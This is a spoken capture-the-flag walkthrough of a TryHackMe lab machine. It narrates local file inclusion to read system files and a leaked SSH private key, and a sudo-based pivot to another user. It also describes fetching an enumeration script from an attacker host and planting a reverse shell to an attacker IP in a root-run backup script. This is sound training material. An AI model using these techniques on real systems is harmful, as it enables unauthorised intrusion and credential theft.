Hey guys, welcome back. So today we'll be working on another TryHackMe challenge. The name is Team, and basically it is having some LFI stuff, and then using some script we can escalate our privilege to root. So this is the room, beginner-friendly boot to root machine, and uh, let's see. So it says it aimed at beginner. As I often see, the boxes are easy but are often a bit harder, and I'm not sure what that means because there are many other rooms which are more easier than this. What I felt. But anyways, let's start. So first thing first. So we will begin with nmap scan. So the IP address is export IP 10.10.11.10.62 sudo nmap scan, and um, meanwhile this is running. Let's check if something is hosted on web version. So it is having a Apache default page. So if you will look carefully, so there is one thing which is not so default, that is title of this page. It works if you see this, add team.thm to your hosts. So basically there is a web host with the name of team.thm. So we need to add this in our host file. So let's add it. Sudo nano etc hosts, and the IP address is this, and then team dot tryhackme. And since this is a web host, let's do a GoBuster scan. So let's set the IP variable to team.thm, and do the GoBuster scan with default variable. Actually, let's set it to small, and we can see there is a 21 port open and there is no mention of anonymous, so most likely we cannot access it using any anonymous credential. And then 22 and 80 port is there. So let's try with FTP. Anyways, just to validate if we can access using anonymous. um, some errors are coming in GoBuster, so connections are getting timed out. Let me check my internet connection, then we'll resume again. Looks fine to me. Let's start it again. Not sure what is the issue. Okay, so in FTP, let's no, there are some issues. Let me resume it again. Okay, so it seems it is sorted out, and um, down here you can see there is one directory. This is assets, and um, this is scripts. So something is hosted on scripts, and before that we were trying with the login of FTP as well. So let's finish that, anonymous and blank password. So it should not accept. Yes, it is. So we cannot do anything uh, with FTP as of now. So let's see if something is hosted on scripts. Uh, so it says forbidden. So this is a directory, and we cannot access the directory listing. It is disabled. So we need to run GoBuster again to check if there is a any file hosted in this folder. So let's start the GoBuster scan again, uh, and this time let's add the scripts folder. And since we are interested in scanning the files in the folder most likely, so let's add the files HTML. So since folder name is scripts, I'm assuming there are files. uh, File name could be with sh or txt maybe. So let's start it, and we can see there is a script called script.txt. So let's check it, what it is saying. And basically it is a script for copying it, and something has to do with FTP. So FTP server, FTP username and password. Username password are dedicated, and there is a note called note to self, had to change the extension of old script in this folder as it has creds in. So there is a script with the name of old or something. So let's try if we can access it, or either we might need to brute force it. Maybe let's try with some random names. Script hyphen old.txt uh, underscore. I mistakenly added the braces, so underscore is also not there, or maybe just old.text, or um, script dot old. Not, okay, so script dot old is the correct file name. So we should be having the credentials in this file. So let's go to downloads folder. Let's cancel this GoBuster scan as of now. Cd space downloads ls cat script.old, and here we got the password and username of FTP user. So let's try FTP $IP. User is FTP user, and password and ls minus la. So we can see there is a folder called workshare, and we can read the content of this folder. So cd workshare lsla again, and there is a file. So let's download this from FTP. Exit cat new site. So it says Dale and Gale. So these are two usernames. So it says I have started coding in the new website. This is currently under development. It can be found dev within our domain. So as per our team policy, please make a copy of your ID RSA and place this in the relevant config files. Okay. So first of all, let's try with the dev domain. Let's do sudo nano etc host and add another host name dev.team.thm, and let's try if we can access something here. Dev.team.thm. Okay, so site is being built. Please place holder link to team share, and you can see the URL at the bottom. It says page equal to teamshare.php. So if we click this, it says placeholder for future team share. So nothing is here, but we can see it is accessing a PHP file. So let's try if we can access /etc/passwd file. Yes, we can. And we can see there are users with the home directory FTP user Gales and Dale. So we know these two users exist from notes.newsite.txt file. So basically we can access all the files on this server, and now we need to find out this thing, that make a copy of your ID RSA and place this in the relevant config file. So first of all, it says as per the team policy, so the location should be outside of home directory of Dale, and then we need to find some relevant config file. So in term of uh, SSH or IDRSA thing, I believe it should be related to SSH config files maybe, and then we can check some Apache or something, but let's find out if we can see something under SSH config files. So this is the file which should be under user personal home directory, and ideally we should not be able to access it, or maybe this is not there at all. So slash home slash Dale slash dot ssh slash config. No, so there is either the file is not there or we don't have access. So as I said, this is the home directory, so we should be checking out something which is common for everybody, and not something which is under any home directory. So scroll down, um, override config file option. So here it is. So this is the path of SSH config. If you don't know, you can anyway search on Google. So let's try if we can access this file. Um etc ssh underscore config, and this is the file. So nothing is in here, so maybe let's open any other page as well to see if we are missing any other config file, especially with SSH. Or the other thing uh, can be to search all the config file in a default maybe Linux operating system, and then we can brute force it. But let's see if we can find out something without brute forcing. So slash etc. Um, so earlier we checked the SSH underscore config. We have already checked this, and then uh, this is the same one. Maybe let's do the slash etc SSH config to locate the file. Okay, let's see if we can find out using our machine. It should be super simple, like locating slash etc slash ssh. So there is a ssh underscore config which we have already checked, then sshd underscore config, and then other ssh underscore host pub and key file. So let's see if this file is readable and we can see something in this config file. This is a bit a longer one, and we can see the ID RSA of user Dale. So this was what we were trying to locate. Let's close all this thing, copy, and let's create a Dale underscore RSA file, and let's put everything here, zooming a bit, home, and let's uncomment everything. There should be a better way of doing this, but I think this is okay for now. Control X, save, and chmod 600 Dale RSA, and let's do the SSH hyphen I Dale RSA Dale at $IP. Yes, and we are in. That's great. So um, the user text user.flag user.txt flag is here, and we can read it. The next thing is to get to the root flag. So uh, it is root.text, should be in slash root. Let's see if we can access root. No, we can't, and we already know that there are at least two users, Dale and Gale, and the FTP user folder. So let's see what we can do using sudo -l. We can use a sudo command with the user Gale, and we can run this file. Let's check um, content of this script. So printf sleep read, and then $name to var dot var slash stats, and then enter date to timestamp, and date is printed and error is getting executed. So, and the error which will come in this command will be redirected to null, and then it is taking a backup using CP. That's it. So we can run something here um, with this parameter. So sudo -u gales, and then the path reading stats, user, and date. So let's try bin slash bash id. So we are in user Gale. Great. So we don't have any password, so we cannot run sudo -l. Don't know what we can do with this user. Let's try if we can run something. Maybe let's check if we can access root. No, we can't. So there is no error because all the errors are redirected to null. So maybe let's exit as of now, and um, let's see if we can find something using enumeration script. So cd slash opt, and then sudo python 3 http server, and here wget http 10.8.21.57 port 8000 linpiece.sh. Yes, Control C and sh lin piece. Great. Meanwhile, this is running. I want to check one more thing. Let's go to downloads and ssh hyphen I tail at dollar $IP, and I want to check the content once again. Home Gales admin checks. So let's see what is the content of this file, just to make sure we are not missing anything. So it is just storing the username, and let's check if something is packed up here in the stats directory. And this file is created when date. So it is created 2 minutes back. So, and it is created with the user Gale. So I guess we have triggered this right now. So apart from this, nothing else in here. Okay. And lin paste is also completed. Let's scroll to top, and from the very top we can see anything which is highlighted in red or yellow. So far nothing interesting. So on 53, most likely some DNS service is running, and we can see the group membership of userdale is LXD. So we can escalate our privilege using this LXD as well. I did this in my last video, I guess, all-in-one. Yep, in all-in-one, I escalated the privilege using LXD. So I'm not going to do that in this room, because the intended way is different for this um, machine. So what I want to check here is two things: the list of interesting files. Yep. So this is basically SUID, and then unexpected files, not so useful, readable files belonging to root and readable by me, but not world readable. So these are just log files, and this is what we should always check to find out if some script or something is running, or some process is running which is writing the file. So we know about these two files, but all these files are written under backup folder, and we can check one of the file, like who wrote this file, the user and group. So I've just copied it. We'll check this thing, and let's scroll down to find more things. And here we can see maybe these two files. So you can check, we can execute it, world executable, and this is the main backup.sh, and this is dev.backup.sh. So most likely the main backup and dev backup is running. So main backup is running with root, and this script is editable by user group admin. We might not be able to use this dev.backup, so let's see if we can do something with main backup sh file. So first of all, check. By the way, I am in the SSH mode in both the windows, so this is not my box. So let's see if we can first of all check the permission of this backed up file. So you can see that the backup is running with root, so that's why the default user is showing as root, and the script should be this one, cat. Okay, so it is just copying everything under team.thm star to this directory. So indeed, this backup is getting triggered from this script, and uh, any member of group admin can make the changes. So are we part of admin, the daily user? ADM is there, and then LXT, LP admin, but not the admin. So maybe let's check if user Gale is part of admin. So we can go back now and run the sudo -u Gales and the script user bin bash id, and yes, user Gale is part of admin. So we will be able to make changes to the script main backup. So let's maybe write the reverse shell script, um, pentest monkey reverse shell, and copy the reverse shell syntax as usual, this one, and echo paste. Can we go? No. So we need to change the IP address 10.8.21.57 port 1234, and what was written after this? Uh, Only this part is missing now. And before pressing the enter, let's open another window here for the reverse shell and CLV LP1234, and let's uh, press enter. And before that, um, we need to mention the path of the script to override the content, maybe double sign and then the script path. I think this should be good. And can we check the content here? Cat. Yes, it is overwritten, and now we got the shell and we are root, so we can read the root flag. Yes, we can. So this is the team beginner challenge, and the previous part is quite easy. We just had to make the change in the right script. It is a matter of just finding the script, and overall the difficulty level is okay, but there are more rooms which are easier and more beginner friendly than this one, but indeed this is also under beginner level category, there is no doubt. So I hope you have learned something and enjoyed this video. If so, please keep watching other videos and subscribe. Have a great day. Bye bye.